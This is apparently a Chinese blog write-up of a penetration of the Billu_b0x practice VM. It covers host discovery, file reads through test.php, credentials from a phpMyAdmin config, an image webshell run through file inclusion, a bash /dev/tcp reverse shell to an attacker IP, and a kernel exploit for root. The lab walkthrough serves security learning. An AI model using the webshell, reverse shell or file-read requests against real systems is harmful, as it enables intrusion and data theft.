一次Billu_b0x渗透学习
这次的Billu_b0x靶场应该说是学习经验,按照大神的流程走了一遍,中间各种扫盲,和学习思路,现在把整体的思路和过程梳理一下。
一、发现IP
虚拟机打开,按照规则所说,NAT模式,没有发现IP
于是ifconfig,找到vmnet8的C段,这里就是虚拟机存在的网段。
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dMlQzeIh-1571210696741)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016104516252.png)]](https://img-blog.csdnimg.cn/201910161525524.png)
nmap -sP 172.16.230.1/24
nmap -sP 是扫描这个C段对ping进行回应的主机,/24 = 255.255.255.0,子网掩码
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UaGL4DUK-1571210696742)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016104543526.png)]找到ip为172.16.230.151](https://img-blog.csdnimg.cn/20191016152610344.png)
二、信息收集
nmap -sV -sC -A -Pn -oN 172.16.230.151.txt 172.16.230.151
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-imrnb0gg-1571210696746)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016104622197.png)]](https://img-blog.csdnimg.cn/20191016152625767.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L25pbmlfYm9vbQ==,size_16,color_FFFFFF,t_70)
ssh和80web端口是开着的。
打开网页目录扫描
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-aVpGBwSR-1571210696750)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016104719204.png)]](https://img-blog.csdnimg.cn/20191016152644551.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L25pbmlfYm9vbQ==,size_16,color_FFFFFF,t_70)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TMurTIer-1571210696754)(/Users/liyang/Library/Application Support/typora-user-images/image-20191012113756970.png)]](https://img-blog.csdnimg.cn/20191016152701518.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L25pbmlfYm9vbQ==,size_16,color_FFFFFF,t_70)
- in.php
- show.php
- add.php
- index.php
- phpmy(字典没扫出来,字典强大还是很重要哇)
| in.php | show.php | add.php | index.php | c.php | phpmy |
|---|---|---|---|---|---|
| phpinfo界面 | 登录界面 | 文件上传界面 | 同登录界面 | 无界面 | phpMyAdmin |
三、初探
-
phpmy是phpMyAdmin界面。
-
主页提示show me your SQLI skills,sqlfuzz字典+burp了一波,发现注入不了,要是有不同的错误回显还好些,SQL注入我是放弃了。
-
add.php有文件上传,但是抓包发现没有回显文件地址,故也没走通。
-
test.php发现有提示
file暗指文件包含?
GET 方式传参file
GET /test.php?file=/etc/passwd HTTP/1.1
Host: 172.16.230.151
User-Agent: Mozilla/5.0(Linux;U;Android2.3.6;zh-cn;GT-S5660Build/GINGERBREAD)AppleWebKit/533.1(KHTML,likeGecko)Version/4.0MobileSafari/533.1MicroMessenger/4.5.255
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=b25l18nkjd4i9g1lug3tm15435
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
无反应
POST 方式传参file
burp直接 change Method
POST /test.php HTTP/1.1
Host: 172.16.230.151
User-Agent: Mozilla/5.0(Linux;U;Android2.3.6;zh-cn;GT-S5660Build/GINGERBREAD)AppleWebKit/533.1(KHTML,likeGecko)Version/4.0MobileSafari/533.1MicroMessenger/4.5.255
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=b25l18nkjd4i9g1lug3tm15435
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
file=/etc/passwd
返回
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4kBa52sO-1571210696764)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016110057094.png)]](https://img-blog.csdnimg.cn/20191016153813391.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L25pbmlfYm9vbQ==,size_16,color_FFFFFF,t_70)
这里可以看到,root和ica用户拥有shell权限。
我们感兴趣的页面源码是不是都可以拿下来?
- c.php
<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );
ini_set( 'session.cookie_httponly', 1 );
$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");
// Check connection
if (mysqli_connect_errno())
{
echo "connection failed -> " . mysqli_connect_error();
}
?>
- index.php
<?php
session_start();
include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
$_SESSION['logged']='';
}
if($_SESSION['logged']==true && $_SESSION['admin']!='')
{
echo "you are logged in :)";
header('Location: panel.php', true, 302);
}
else
{
echo '<div align=center style="margin:30px 0px 0px 0px;">
<font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font>
<br><br>
Show me your SQLI skills <br>
<form method=post>
Username :- <Input type=text name=un>   Password:- <input type=password name=ps> <br><br>
<input type=submit name=login value="let\'s login">';
}
if(isset($_POST['login']))
{
$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));
$run='select * from auth where pass=\''.$pass.'\' and uname=\''.$uname.'\'';
$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {
$row = mysqli_fetch_assoc($result);
echo "You are allowed<br>";
$_SESSION['logged']=true;
$_SESSION['admin']=$row['username'];
header('Location: panel.php', true, 302);
}
else
{
echo "<script>alert('Try again');</script>";
}
}
echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> ";
?>
- add.php
<?php
echo '<form method="post" enctype="multipart/form-data">
Select image to upload:
<input type="file" name=image>
<input type=text name=name value="name">
<input type=text name=address value="address">
<input type=text name=id value=1337 >
<input type="submit" value="upload" name="upload">
</form>';
?>
好了,就不一一列出来了。
四、两种方式拿到root
一、phpmyadmin配置文件
前面已经有任意文件下载的问题,phpmyadmin默认配置文件config.inc.php
猜测目录可能在/var/www/phpmy/config.inc.php
POST /test.php HTTP/1.1
Host: 172.16.230.151
User-Agent: Mozilla/5.0(Linux;U;Android2.3.6;zh-cn;GT-S5660Build/GINGERBREAD)AppleWebKit/533.1(KHTML,likeGecko)Version/4.0MobileSafari/533.1MicroMessenger/4.5.255
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=b25l18nkjd4i9g1lug3tm15435
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
file=/var/www/phpmy/config.inc.php
结果
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gze4gHGY-1571210696766)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016111535054.png)]](https://img-blog.csdnimg.cn/20191016153836570.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L25pbmlfYm9vbQ==,size_16,color_FFFFFF,t_70)
使用root和roottoor进行ssh登陆
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zmTtVCjg-1571210696770)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016111637024.png)]](https://img-blog.csdnimg.cn/20191016153851397.png)
实验结束。
二、常规渗透
1、登入后台
注意到c.php,有mysql的连接秘钥billu,b0x_billu尝试登陆phpmy后台
看到了这个网站的数据库结构,使用auth下的账号登陆index.php
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iP5ftrLr-1571210696771)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016111750558.png)]](https://img-blog.csdnimg.cn/2019101615390768.png)
成功登录界面
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GMMYdzWt-1571210696773)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016111832680.png)]](https://img-blog.csdnimg.cn/20191016153923876.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L25pbmlfYm9vbQ==,size_16,color_FFFFFF,t_70)
这里AddUser功能有上传文件,当然是做了限制的,但是我们有源码可以进行审计。
2、代码审计
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3kIXvWgH-1571210696778)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016112100176.png)]](https://img-blog.csdnimg.cn/20191016153940756.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L25pbmlfYm9vbQ==,size_16,color_FFFFFF,t_70)
好的,没有对传入的参数进行过滤,存在任意文件包含。
3、图片马+本地文件包含拿到cmdshell
可以想到图片马+任意文件包含拿到cmdShell
我们看看continue哪些参数我们可控。
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-T2Urry1q-1571210696780)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016112259448.png)]](https://img-blog.csdnimg.cn/20191016153956111.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L25pbmlfYm9vbQ==,size_16,color_FFFFFF,t_70)
load直接作为参数$choice在include中被包含,那我直接将load改为图片马的路径,不就可以解析图片马了么。
OK,我们上传正常的图片上去,在图片数据流最后,加入
<?php system($_GET['cmd']);?>
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Zon2XJfN-1571210696786)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016112830210.png)]](https://img-blog.csdnimg.cn/20191016154012898.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L25pbmlfYm9vbQ==,size_16,color_FFFFFF,t_70)
这是我们上传的图片地址/uploaded_images/j.jpg。
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-q0Dbjfgi-1571210696789)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016113046379.png)]](https://img-blog.csdnimg.cn/20191016154050781.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L25pbmlfYm9vbQ==,size_16,color_FFFFFF,t_70)
点击continue转包,将GET后的参数改为cmd=cat%20/etc/passwd;ls为图片马提供参数,将post中的body改为load=/uploaded_images/j.jpg&continue=continue包含我们的图片马目录
POST /panel.php?cmd=cat%20/etc/passwd;ls HTTP/1.1
Host: 172.16.230.151
User-Agent: Mozilla/5.0(Linux;U;Android2.3.6;zh-cn;GT-S5660Build/GINGERBREAD)AppleWebKit/533.1(KHTML,likeGecko)Version/4.0MobileSafari/533.1MicroMessenger/4.5.255
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Connection: close
Referer: http://172.16.230.151/panel.php
Cookie: PHPSESSID=b25l18nkjd4i9g1lug3tm15435
Upgrade-Insecure-Requests: 1
load=/uploaded_images/j.jpg&continue=continue
返回,图片马被触发成功。
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nxafxSyi-1571210696790)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016113327508.png)]](https://img-blog.csdnimg.cn/20191016154109526.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L25pbmlfYm9vbQ==,size_16,color_FFFFFF,t_70)
4、反弹shell
echo "bash -i >& /dev/tcp/192.168.31.237/4444 0>&1" | bash
命令解释:
bash -i : bash是Linux下一个常见的shell,
-i参数表示产生一个交互式的shell/dev/tcp/192.168.175.134/8080 :
/dev/tcp|udp/ip/port是一个Linux中比较特殊的一个文件,如果在Linux上访问就会发现这个文件并不存在,其含义是让主机与目标主机ip在端口port建立一个tcp或udp连接0>&1:将标准输入
0输出重定向至标准输出1。或者可以这么理解,将标准输入0和标准输出1合并,在重定向至1,因为前面已经将标准输出1重定向至/dev/tcp/192.168.175.134/8080,所以现在标准输入0和标准输出1都指向/dev/tcp/192.168.175.134/8080。
至于echo 和 | bash是代表什么意思,我就不太清楚了,有知道的表哥可以告知下!
将echo "bash -i >& /dev/tcp/172.16.1.75/4444 0>&1" | bash进行URL编码,作为cmd参数传入
本地nc -lvp 4444监听反弹来的shell。
uploaded_images目录我们拥有读写执行权限的目录
5、提权
uname -a找到对应liunx版本
https://www.exploit-db.com/exploits/37292/
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-svnjWX7X-1571210696803)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016150613653.png)]](https://img-blog.csdnimg.cn/20191016154207442.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L25pbmlfYm9vbQ==,size_16,color_FFFFFF,t_70)
拿到root
五、总结
信息收集很重要!所有的信息都要留意,切不能闷头无脑撸站。如果没有test.php的提示,就很难有突破点
1271
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
